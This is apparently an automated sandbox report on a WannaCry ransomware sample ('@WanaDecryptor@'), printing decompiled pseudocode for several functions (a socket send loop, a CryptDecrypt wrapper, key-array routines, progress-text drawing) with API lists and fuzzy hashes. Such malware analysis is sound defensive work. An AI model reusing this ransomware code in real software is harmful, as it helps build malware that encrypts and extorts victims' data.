                                                      											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
                                                      											_t395 =  *(_t403 + 0x10);
                                                      											_t214 =  *(_t403 + 0x24) + 1;
                                                      											_t388 = _t388 + 1;
                                                      											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
                                                      											 *(_t403 + 0x24) = _t214;
                                                      											if(_t214 < _t395) {
                                                      												continue;
                                                      											}
                                                      											goto L50;
                                                      										}
                                                      										goto L51;
                                                      									}
                                                      									if(_t395 <= 1) {
                                                      										goto L46;
                                                      									}
                                                      									_t101 = _t236 + 0x418; // 0x46c
                                                      									_t215 = _t101;
                                                      									_t278 = _t395 - 1;
                                                      									do {
                                                      										 *_t215 =  *_t215 ^  *(_t215 - 4);
                                                      										_t215 =  &(_t215[1]);
                                                      										_t278 = _t278 - 1;
                                                      									} while (_t278 != 0);
                                                      									goto L46;
                                                      									L50:
                                                      									_t251 =  *(_t403 + 0x2c);
                                                      								} while (_t388 <  *(_t403 + 0x30));
                                                      								goto L51;
                                                      							}
                                                      							_t58 = _t236 + 0x414; // 0x468
                                                      							 *(_t403 + 0x24) = _t58;
                                                      							while(_t388 < _t353) {
                                                      								asm("cdq");
                                                      								_t378 = _t388 / _t251;
                                                      								asm("cdq");
                                                      								_t321 = _t388 % _t251;
                                                      								 *(_t403 + 0x28) = _t321;
                                                      								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
                                                      								_t388 = _t388 + 1;
                                                      								_t224 =  *(_t403 + 0x24);
                                                      								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
                                                      								_t353 =  *(_t403 + 0x30);
                                                      								 *(_t403 + 0x24) = _t224 + 4;
                                                      								if(_t388 < _t395) {
                                                      									continue;
                                                      								}
                                                      								goto L35;
                                                      							}
                                                      							goto L51;
                                                      						}
                                                      						 *(_t403 + 0x24) = _t395;
                                                      						do {
                                                      							_t387 = _t387 + 4;
                                                      							 *(_t387 - 4) = 0 << 0x18;
                                                      							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
                                                      							_t189 = _t189 + 4;
                                                      							_t337 =  *(_t403 + 0x24) - 1;
                                                      							 *(_t403 + 0x24) = _t337;
                                                      						} while (_t337 != 0);
                                                      						goto L31;
                                                      					}
                                                      					_t38 = _t236 + 0x1e8; // 0x23c
                                                      					_t391 = _t38;
                                                      					do {
                                                      						if(_t251 > 0) {
                                                      							memset(_t391, 0, _t251 << 2);
                                                      							_t403 = _t403 + 0xc;
                                                      							_t251 =  *(_t403 + 0x2c);
                                                      						}
                                                      						_t293 = _t293 + 1;
                                                      						_t391 = _t391 + 0x20;
                                                      					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
                                                      					goto L28;
                                                      				} else {
                                                      					_t33 = _t236 + 8; // 0x5c
                                                      					_t392 = _t33;
                                                      					do {
                                                      						if(_t251 > 0) {
                                                      							memset(_t392, 0, _t251 << 2);
                                                      							_t403 = _t403 + 0xc;
                                                      							_t251 =  *(_t403 + 0x2c);
                                                      						}
                                                      						_t292 = _t292 + 1;
                                                      						_t392 = _t392 + 0x20;
                                                      					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
                                                      					goto L23;
                                                      				}
                                                      			}

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                                      • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                      				void _v1024;
                                                      				char _v1028;
                                                      				intOrPtr _v1032;
                                                      				intOrPtr _v1036;
                                                      				void* _v1040;
                                                      				intOrPtr _v1044;
                                                      				char _v1048;
                                                      				signed int _t34;
                                                      				void* _t36;
                                                      				intOrPtr _t37;
                                                      				void* _t43;
                                                      				void* _t45;
                                                      				intOrPtr _t46;
                                                      				void* _t49;
                                                      				signed int _t58;
                                                      				intOrPtr* _t60;
                                                      				signed int _t70;
                                                      				signed int _t71;
                                                      				signed int _t78;
                                                      				void* _t83;
                                                      				void* _t91;
                                                      				void* _t102;
                                                      				void* _t103;
                                                      				void* _t104;
                                                      				void* _t105;
                                                      				void** _t107;
                                                      				void** _t109;
                                                      
                                                      				_t106 =  &_v1040;
                                                      				_t105 = _a8;
                                                      				_t60 = __ecx;
                                                      				_v1032 = 0;
                                                      				if(_t105 != 0) {
                                                      					_t34 = E0040D5D0(__ecx);
                                                      					__eflags = _t34;
                                                      					if(_t34 != 0) {
                                                      						__eflags = _a12;
                                                      						if(_a12 == 0) {
                                                      							_t36 = _a4;
                                                      							_v1040 = _t36;
                                                      							_t91 = _t36;
                                                      							goto L13;
                                                      						} else {
                                                      							__eflags = _a16;
                                                      							if(_a16 != 0) {
                                                      								__eflags = _t105 - 0x400;
                                                      								if(_t105 > 0x400) {
                                                      									_t49 = E00412A90(_t105);
                                                      									_t109 =  &(( &_v1040)[1]);
                                                      									_v1040 = _t49;
                                                      									__eflags = _t49;
                                                      									if(_t49 != 0) {
                                                      										_t103 = _a4;
                                                      										_t70 = _t105;
                                                      										_t71 = _t70 >> 2;
                                                      										memcpy(_t49, _t103, _t71 << 2);
                                                      										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
                                                      										_t106 =  &(_t109[6]);
                                                      										_t91 = _v1040;
                                                      										E0040D2B0(_t60, _t91, _t105);
                                                      										goto L13;
                                                      									} else {
                                                      										return _t49;
                                                      									}
                                                      								} else {
                                                      									_t104 = _a4;
                                                      									_t78 = _t105 >> 2;
                                                      									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
                                                      									_t106 =  &(( &_v1040)[6]);
                                                      									_t83 =  &_v1024;
                                                      									_t91 = _t83;
                                                      									_v1040 = _t83;
                                                      									E0040D2B0(_t60, _t91, _t105);
                                                      									goto L13;
                                                      								}
                                                      							} else {
                                                      								_t91 = _a4;
                                                      								E0040D2B0(__ecx, _t91, _t105);
                                                      								L13:
                                                      								_push( &_v1028);
                                                      								L0041303E();
                                                      								_t37 = _v1028;
                                                      								_t107 =  &(_t106[1]);
                                                      								_t102 = 0;
                                                      								_v1036 = _t37;
                                                      								__eflags = _t105;
                                                      								if(_t105 > 0) {
                                                      									while(1) {
                                                      										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
                                                      										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
                                                      											goto L25;
                                                      										}
                                                      										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
                                                      										__eflags = _t43;
                                                      										if(__eflags > 0) {
                                                      											_t102 = _t102 + _t43;
                                                      											__eflags = _t102;
                                                      											_push( &_v1048);
                                                      											goto L24;
                                                      										} else {
                                                      											if(__eflags != 0) {
                                                      												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
                                                      												__eflags = _t45 - 0x2733;
                                                      												if(_t45 == 0x2733) {
                                                      													_t46 = _v1044;
                                                      													__eflags = _t46 - 0x64;
                                                      													_v1044 = _t46 + 1;
                                                      													if(_t46 > 0x64) {
                                                      														Sleep(0x64);
                                                      														_v1044 = 0;
                                                      													}
                                                      													_push( &_v1048);
                                                      													L24:
                                                      													L0041303E();
                                                      													_t107 =  &(_t107[1]);
                                                      													__eflags = _t102 - _t105;
                                                      													if(_t102 < _t105) {
                                                      														_t37 = _v1048;
                                                      														continue;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L25;
                                                      									}
                                                      								}
                                                      								L25:
                                                      								__eflags = _t91 - _a4;
                                                      								if(_t91 != _a4) {
                                                      									__eflags = _t91 -  &_v1024;
                                                      									if(_t91 !=  &_v1024) {
                                                      										__eflags = _t91;
                                                      										if(_t91 != 0) {
                                                      											free(_t91);
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t102;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t58 = _t34 | 0xffffffff;
                                                      						__eflags = _t58;
                                                      						return _t58;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                                      • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404AF0(void* __ecx, void* _a4, int _a8) {
                                                      				intOrPtr* _v4;
                                                      				void* _v8;
                                                      				signed int _v12;
                                                      				int _t12;
                                                      				void* _t19;
                                                      				signed int _t22;
                                                      				signed int _t23;
                                                      				struct _CRITICAL_SECTION* _t30;
                                                      				void* _t36;
                                                      
                                                      				_t19 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 8)) != 0) {
                                                      					_t2 = _t19 + 0x10; // 0x14
                                                      					_t30 = _t2;
                                                      					EnterCriticalSection(_t30);
                                                      					_t36 = _a4;
                                                      					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
                                                      					_push(_t30);
                                                      					if(_t12 != 0) {
                                                      						LeaveCriticalSection();
                                                      						_t22 = _v12;
                                                      						_t23 = _t22 >> 2;
                                                      						memcpy(_v8, _t36, _t23 << 2);
                                                      						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
                                                      						return 1;
                                                      					} else {
                                                      						LeaveCriticalSection();
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                                      • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CryptDecryptEnterLeave
                                                      • String ID:
                                                      • API String ID: 1395129968-0
                                                      • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                                      • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      [Figure: control-flow graph of the function starting at 4090f0, with nodes marked Executed / Not Executed]
                                                      C-Code - Quality: 86%
                                                      			E004090F0(intOrPtr* __ecx, void* __fp0) {
                                                      				signed int _t226;
                                                      				signed int _t230;
                                                      				struct tagPOINT _t232;
                                                      				long _t233;
                                                      				signed int _t237;
                                                      				signed int _t242;
                                                      				intOrPtr _t246;
                                                      				intOrPtr* _t264;
                                                      				signed int _t269;
                                                      				signed int _t270;
                                                      				signed int _t271;
                                                      				signed int _t272;
                                                      				signed int _t276;
                                                      				intOrPtr _t279;
                                                      				signed int _t282;
                                                      				intOrPtr* _t283;
                                                      				struct tagPOINT _t295;
                                                      				signed int _t311;
                                                      				signed int _t314;
                                                      				signed int** _t321;
                                                      				intOrPtr _t361;
                                                      				intOrPtr _t418;
                                                      				intOrPtr* _t429;
                                                      				signed int* _t433;
                                                      				long _t437;
                                                      				signed int _t438;
                                                      				intOrPtr* _t440;
                                                      				signed int _t441;
                                                      				intOrPtr _t442;
                                                      				void* _t443;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041414D);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t442;
                                                      				_t443 = _t442 - 0xc4;
                                                      				_t321 =  *(_t443 + 0xd8);
                                                      				_t226 = _t321[1];
                                                      				_t429 = __ecx;
                                                      				if((_t226 & 0x00000003) == 0) {
                                                      					L49:
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
                                                      					return _t226;
                                                      				}
                                                      				_t433 =  *_t321;
                                                      				 *(_t443 + 0x40) = _t226 & 0x00000004;
                                                      				 *(_t443 + 0x10) = 0;
                                                      				L00412DA6();
                                                      				_push(_t443 + 0x14);
                                                      				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
                                                      				L00412DD6();
                                                      				_t230 = _t321[1] & 0x00000300;
                                                      				if(_t230 == 0x100) {
                                                      					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                                      						_push("%d%%");
                                                      						L00412DA0();
                                                      					}
                                                      					_t232 = _t321[7];
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
                                                      					asm("fild dword [esp+0x28]");
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
                                                      					asm("fidiv dword [esp+0x28]");
                                                      					L0041304A();
                                                      					 *(_t443 + 0x10) = _t232;
                                                      				} else {
                                                      					if(_t230 == 0x200) {
                                                      						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                                      							_push("%d");
                                                      							L00412DA0();
                                                      						}
                                                      						 *(_t443 + 0x10) = _t321[6];
                                                      					}
                                                      				}
                                                      				_t226 =  *(_t443 + 0x14);
                                                      				if( *((intOrPtr*)(_t226 - 8)) == 0) {
                                                      					L48:
                                                      					 *(_t443 + 0xdc) = 0xffffffff;
                                                      					L00412CC2();
                                                      					goto L49;
                                                      				} else {
                                                      					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
                                                      					L00412DE2();
                                                      					_t437 = _t233;
                                                      					 *(_t443 + 0x54) = _t433;
                                                      					 *(_t443 + 0x50) = 0x416794;
                                                      					 *(_t443 + 0xdc) = 1;
                                                      					E00409DF0(_t443 + 0x58);
                                                      					 *(_t443 + 0x58) = 0x416780;
                                                      					 *((char*)(_t443 + 0xe0)) = 2;
                                                      					 *(_t443 + 0x64) = 0;
                                                      					 *(_t443 + 0x54) = 0x41677c;
                                                      					E00409870(_t443 + 0x54, _t437);
                                                      					 *(_t443 + 0x68) = _t433;
                                                      					 *((char*)(_t443 + 0xe0)) = 4;
                                                      					 *(_t443 + 0x70) = 0xffffffff;
                                                      					 *(_t443 + 0x68) = 0x416778;
                                                      					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
                                                      					 *(_t443 + 0x90) = _t237;
                                                      					 *(_t443 + 0x6c) = _t237;
                                                      					 *(_t443 + 0x88) = _t433;
                                                      					_push(1);
                                                      					 *((char*)(_t443 + 0xe0)) = 6;
                                                      					 *(_t443 + 0x90) = 0;
                                                      					 *(_t443 + 0x88) = 0x416774;
                                                      					L00412DC4();
                                                      					 *(_t443 + 0x70) = _t237;
                                                      					 *(_t443 + 0x8c) = _t237;
                                                      					 *(_t443 + 0x7c) = _t433;
                                                      					_push(0xe);
                                                      					 *((char*)(_t443 + 0xe0)) = 8;
                                                      					 *(_t443 + 0x84) = 0xffffffff;
                                                      					 *(_t443 + 0x7c) = 0x416770;
                                                      					L00413004();
                                                      					 *(_t443 + 0x74) = _t237;
                                                      					 *(_t443 + 0x80) = _t237;
                                                      					 *((char*)(_t443 + 0xe4)) = 9;
                                                      					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
                                                      					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
                                                      					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
                                                      					L00412DA6();
                                                      					_push( *(_t443 + 0x10));
                                                      					_push( *(_t443 + 0x14));
                                                      					_push(_t443 + 0x1c);
                                                      					 *((char*)(_t443 + 0xe8)) = 0xa;
                                                      					L00412E00();
                                                      					_t443 = _t443 + 0xc;
                                                      					_t242 = 0;
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = 0;
                                                      					if(_t437 != 0) {
                                                      						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
                                                      						_t242 = 0;
                                                      						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
                                                      					}
                                                      					 *(_t443 + 0x10) = _t242;
                                                      					 *(_t443 + 0x2c) = _t242;
                                                      					 *(_t443 + 0x24) = _t242;
                                                      					_t438 = 0;
                                                      					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
                                                      					_t246 =  *((intOrPtr*)(_t443 + 0x28));
                                                      					if(_t246 != 0) {
                                                      						if(_t246 != 0x5a) {
                                                      							if(_t246 != 0xb4) {
                                                      								if(_t246 != 0x10e) {
                                                      									goto L21;
                                                      								}
                                                      								_t441 =  *(_t443 + 0x20);
                                                      								 *(_t443 + 0x10) = _t441;
                                                      								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                                      								_t438 =  ~_t441;
                                                      								L20:
                                                      								 *(_t443 + 0x24) = 0;
                                                      								goto L21;
                                                      							}
                                                      							_t311 =  *(_t443 + 0x20);
                                                      							 *(_t443 + 0x2c) = _t311;
                                                      							_t438 = 0;
                                                      							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                                      							 *(_t443 + 0x24) =  ~_t311;
                                                      							goto L21;
                                                      						}
                                                      						_t438 =  *(_t443 + 0x20);
                                                      						 *(_t443 + 0x10) = _t438;
                                                      						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                                      						goto L20;
                                                      					} else {
                                                      						_t314 =  *(_t443 + 0x20);
                                                      						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                                      						 *(_t443 + 0x2c) = _t314;
                                                      						 *(_t443 + 0x24) = _t314;
                                                      						L21:
                                                      						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
                                                      						if((_t321[1] & 0x00000010) == 0) {
                                                      							asm("cdq");
                                                      							 *(_t443 + 0x44) =  *_t433;
                                                      							asm("cdq");
                                                      							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
                                                      							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
                                                      								_t264 =  *((intOrPtr*)(_t443 + 0xec));
                                                      								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
                                                      									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
                                                      								}
                                                      								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
                                                      								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
                                                      									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                                      									if( *(_t443 + 0x90) == 0xffffffff) {
                                                      										 *(_t443 + 0x6c) = _t282;
                                                      									}
                                                      									_t283 = _t440;
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
                                                      									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
                                                      									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
                                                      									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
                                                      								}
                                                      								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                                      									L39:
                                                      									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
                                                      									 *(_t443 + 0xdc) = 9;
                                                      									L00412CC2();
                                                      									 *(_t443 + 0x78) = 0x416770;
                                                      									_t269 =  *(_t443 + 0x74);
                                                      									 *(_t443 + 0xdc) = 0xb;
                                                      									if(_t269 != 0xffffffff) {
                                                      										_push(_t269);
                                                      										L00413004();
                                                      									}
                                                      									 *(_t443 + 0x84) = 0x416774;
                                                      									_t270 =  *(_t443 + 0x70);
                                                      									 *(_t443 + 0xdc) = 0xc;
                                                      									if(_t270 != 0) {
                                                      										_push(_t270);
                                                      										L00412DC4();
                                                      									}
                                                      									 *(_t443 + 0x64) = 0x416778;
                                                      									_t271 =  *(_t443 + 0x6c);
                                                      									 *(_t443 + 0xdc) = 0xd;
                                                      									if(_t271 != 0xffffffff) {
                                                      										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
                                                      									}
                                                      									 *(_t443 + 0x50) = 0x41677c;
                                                      									_t272 =  *(_t443 + 0x60);
                                                      									 *(_t443 + 0xdc) = 0xf;
                                                      									if(_t272 != 0) {
                                                      										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
                                                      									}
                                                      									 *(_t443 + 0x60) = 0;
                                                      									L00412D52();
                                                      									_t226 = _t443 + 0x58;
                                                      									 *(_t443 + 0x58) = 0x415c00;
                                                      									 *(_t443 + 0x70) = _t226;
                                                      									 *(_t443 + 0xdc) = 0x10;
                                                      									L00412D52();
                                                      									 *(_t443 + 0x58) = 0x415bec;
                                                      									 *(_t443 + 0x50) = 0x416794;
                                                      									goto L48;
                                                      								} else {
                                                      									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                                      									if( *(_t443 + 0x6c) == 0xffffffff) {
                                                      										 *(_t443 + 0x6c) = _t276;
                                                      									}
                                                      									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
                                                      									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
                                                      									_t279 =  *_t429;
                                                      									_push(_t443 + 0x48);
                                                      									_push(_t443 + 0x18);
                                                      									_t361 = _t443 + 0x38;
                                                      									L38:
                                                      									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
                                                      									goto L39;
                                                      								}
                                                      							}
                                                      							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
                                                      							goto L39;
                                                      						}
                                                      						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
                                                      						_t295 =  *(_t443 + 0x2c);
                                                      						if( *(_t443 + 0x40) == 0) {
                                                      							_t295 =  *(_t443 + 0x10);
                                                      						}
                                                      						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                                      							goto L39;
                                                      						} else {
                                                      							asm("cdq");
                                                      							_t418 =  *((intOrPtr*)(_t443 + 0x34));
                                                      							 *(_t443 + 0x40) =  *_t433;
                                                      							asm("cdq");
                                                      							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
                                                      							_t279 =  *_t429;
                                                      							_push(_t443 + 0x48);
                                                      							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
                                                      							_push(_t443 + 0x18);
                                                      							goto L38;
                                                      						}
                                                      					}
                                                      				}
                                                      			}

































                                                      0x0040967b
                                                      0x0040967d
                                                      0x00409680
                                                      0x00409680
                                                      0x00409685
                                                      0x0040968d
                                                      0x00409691
                                                      0x0040969c
                                                      0x004096a3
                                                      0x004096a3
                                                      0x004096a6
                                                      0x004096ae
                                                      0x004096b2
                                                      0x004096bc
                                                      0x004096c5
                                                      0x004096c5
                                                      0x004096cc
                                                      0x004096d4
                                                      0x004096d9
                                                      0x004096dd
                                                      0x004096e5
                                                      0x004096ed
                                                      0x004096f5
                                                      0x004096fa
                                                      0x00409702
                                                      0x00000000
                                                      0x004095c1
                                                      0x004095c9
                                                      0x004095d1
                                                      0x004095d3
                                                      0x004095d3
                                                      0x004095e0
                                                      0x004095eb
                                                      0x004095ef
                                                      0x004095fc
                                                      0x00409604
                                                      0x00409608
                                                      0x0040960a
                                                      0x0040960b
                                                      0x0040960c
                                                      0x00409610
                                                      0x00409614
                                                      0x00000000
                                                      0x00409614
                                                      0x004095bf
                                                      0x0040950c
                                                      0x00000000
                                                      0x0040950c
                                                      0x00409421
                                                      0x0040942c
                                                      0x00409430
                                                      0x00409432
                                                      0x00409432
                                                      0x00409444
                                                      0x00000000
                                                      0x0040944a
                                                      0x0040945c
                                                      0x0040945f
                                                      0x00409467
                                                      0x00409478
                                                      0x0040948e
                                                      0x00409491
                                                      0x0040949b
                                                      0x0040949c
                                                      0x004094a3
